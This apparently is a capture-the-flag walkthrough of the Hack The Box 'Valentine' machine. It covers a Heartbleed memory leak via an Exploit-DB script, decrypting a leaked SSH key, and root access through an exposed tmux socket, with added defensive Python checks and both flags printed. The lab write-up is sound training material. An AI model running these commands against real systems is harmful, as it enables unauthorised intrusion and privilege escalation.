
Valentine

  • Admin
  • Jan 7, 2022
  • 2 min read

Updated: Jul 10, 2023


Enumeration


As usual, let's start with nmap:

nmap -sV -sC 10.10.10.79

Port 80 is open so let's check via our browser:


Heart and blood...


Port 443 is open so let's check in our browser:


Let's do a scan of port 443 using:

nmap -sV -sC -p 443 --script vuln 10.10.10.79

This mentions the Heartbleed vulnerability. The blood and the hearts from earlier make sense now!


From your VM, open a new command prompt window and type:

searchsploit heartbleed

Searchsploit is the command-line search tool for Exploit-DB.

Let's use the first exploit on the list:

searchsploit -m exploits/multiple/remote/32764.py

This will copy the exploit straight into your current directory.


ls

Let's run the exploit using:

python2 32764.py 10.10.10.79

If you scroll through, on the right side, you can see the following string:

aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

This is base64. We can decode it using:

echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 --decode

heartbleedbelievethehype


Let's keep that for later.


Let's now use gobuster to find any hidden directories:

gobuster dir -u http://10.10.10.79 -w /opt/useful/SecLists/Discovery/Web-Content/big.txt

We find 10.10.10.79/dev

Let's check it out:


Click on hype_key


Let's convert the above hex to ASCII. Open a new command prompt and type:

cd Downloads
ls
wget http://10.10.10.79/dev/hype_key

This downloads the key to the VM.

ls

The file is now here; it is called hype_key.

cat hype_key | xxd -r -p

This command converts the hex dump back to ASCII (xxd -r -p reverses a plain hex dump).


The key is as per below. But it is encrypted!

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
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-----END RSA PRIVATE KEY-----
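As an added example (not part of the original walkthrough), the Python below does what `cat hype_key | xxd -r -p` does and then reads the PEM headers to report whether the key is passphrase-protected and with which cipher. The PEM body here is a constructed placeholder, not the key from the box; only the Proc-Type and DEK-Info headers mirror the ones shown above.

```python
import re

# Constructed sample, not the key from the box: the same kind of PEM wrapper and
# the Proc-Type / DEK-Info headers shown above, around a placeholder body
# ("QUJDRA==" is just base64 for "ABCD").
SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46\n"
    "\n"
    "QUJDRA==\n"
    "-----END RSA PRIVATE KEY-----\n"
)

def to_plain_hexdump(data: bytes, width: int = 60) -> str:
    """Build the hex-digits-only form (like hype_key on the web server) for the demo."""
    digits = data.hex()
    return "\n".join(digits[i:i + width] for i in range(0, len(digits), width)) + "\n"

SAMPLE_HEX = to_plain_hexdump(SAMPLE_PEM.encode())

def hex_to_bytes(text: str) -> bytes:
    """Equivalent of `xxd -r -p`: drop whitespace and decode the remaining hex digits."""
    digits = re.sub(r"\s+", "", text)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits: not a complete byte stream")
    return bytes.fromhex(digits)

PEM_BEGIN = re.compile(r"^-----BEGIN ([A-Z0-9 ]+)-----$")
PEM_HEADER = re.compile(r"^([A-Za-z0-9-]+):\s*(.*)$")

def inspect_pem(data: bytes) -> dict:
    """Report the PEM label and whether legacy OpenSSL passphrase headers are present."""
    info = {"label": None, "encrypted": False, "cipher": None, "iv": None}
    lines = iter(data.decode("ascii", errors="replace").splitlines())
    for line in lines:                      # skip anything before the BEGIN line
        m = PEM_BEGIN.match(line.strip())
        if m:
            info["label"] = m.group(1)
            break
    for line in lines:                      # headers end at the first non "Key: value" line
        m = PEM_HEADER.match(line.strip())
        if not m:
            break
        key, value = m.group(1), m.group(2)
        if key == "Proc-Type" and "ENCRYPTED" in value:
            info["encrypted"] = True
        elif key == "DEK-Info":
            cipher, _, iv = value.partition(",")
            info["cipher"], info["iv"] = cipher.strip(), iv.strip()
    return info

if __name__ == "__main__":
    pem = hex_to_bytes(SAMPLE_HEX)
    print(pem.decode())
    print(inspect_pem(pem))
```

The Proc-Type/DEK-Info pair is OpenSSL's legacy PEM passphrase format: the key material is protected only by the passphrase, which is why a string recovered from the server's memory was enough to open it. The same `inspect_pem` check is a quick way to audit keys found in web roots or backups for this format.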

Let's save the key under a new file called "hype_key_encrypted" using:

cat hype_key | xxd -r -p > hype_key_encrypted
ls

Let's now use openssl to try to decrypt using:

openssl rsa -in hype_key_encrypted -out hype_key_decrypted

It is asking for a passphrase. Let's try what we just found earlier:

heartbleedbelievethehype



It worked!


ls

Now we have a new file called hype_key_decrypted.


Let's now try SSH, guessing the username hype:

ssh -i hype_key_decrypted hype@10.10.10.79

It works! We are in.


whoami

cd Desktop

ls
cat user.txt

Congratulations! You got the user flag!


e6710a5464769fd5fcd216e076961750


Let's now check the root folder:


cd ..
ls
cd ..
ls
cd ..
ls

cd root

Access is denied, so we need to escalate privileges.



Privilege Escalation


Go back to the home directory:

cd ~
ls -al

We find .bash_history:


cat .bash_history

ps aux | grep tmux

Let's look up tmux and find out more about this process. After some research, we find that we can attach to that session's socket with:

tmux -S /.devs/dev_sess

A new prompt window appears.


whoami

We are root!
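The root session was reachable because its tmux socket sat on a path any local user could write to. As an added example (not part of the original walkthrough), the Python below is the audit a defender would run to find such sockets: it walks a directory tree and reports every Unix socket that group members or others can write to. The demo creates its own throwaway socket under a temporary directory; the name dev_sess is reused from the walkthrough only as a label.

```python
import os
import socket
import stat
import tempfile

def find_shared_sockets(root: str, max_depth: int = 4) -> list:
    """Walk `root` and return (path, owner uid, mode) for every Unix socket that
    group members or everyone else may write to. On Linux, connecting to a
    stream socket needs write permission on the socket file, so a socket like
    that owned by another user is a session anyone local can attach to."""
    findings = []
    base_depth = root.rstrip(os.sep).count(os.sep)
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.count(os.sep) - base_depth >= max_depth:
            dirnames[:] = []                 # do not descend any further
        for name in filenames:               # sockets are listed as non-directories
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                     # entry vanished or is unreadable
            if not stat.S_ISSOCK(st.st_mode):
                continue
            perms = stat.S_IMODE(st.st_mode)
            if perms & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, st.st_uid, oct(perms)))
    return findings

def make_demo_socket(directory: str, name: str = "dev_sess", mode: int = 0o777):
    """Constructed fixture: bind a Unix socket and set its permission bits."""
    path = os.path.join(directory, name)
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.bind(path)
    os.chmod(path, mode)
    return path, sock

def demo() -> dict:
    """Run the check on a throwaway directory: a 0777 socket is flagged,
    the same socket tightened to 0700 is not."""
    workdir = tempfile.mkdtemp(prefix="sock-audit-")
    path, sock = make_demo_socket(workdir, mode=0o777)
    try:
        flagged = find_shared_sockets(workdir)
        os.chmod(path, 0o700)                # the fix: owner-only access
        clean = find_shared_sockets(workdir)
    finally:
        sock.close()
        os.unlink(path)
        os.rmdir(workdir)
    return {"flagged": [f[0] for f in flagged], "after_fix": clean, "path": path}

if __name__ == "__main__":
    print(demo())
```

Run against `/` (or the directories a scheduled check cares about) and treat any hit owned by a different user, especially root, as a finding. tmux's own default keeps its socket in a per-user directory it creates with mode 0700; the problem on this box is a root session parked on a shared, world-accessible path, and the fix is to tighten or remove that socket rather than leave the session behind.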


ls
cd ~
ls
cat root.txt

f1bb6d759df1f272914ebbc9ed7765b2


Congratulations! You got the root flag!




©2025 by My Tech On IT
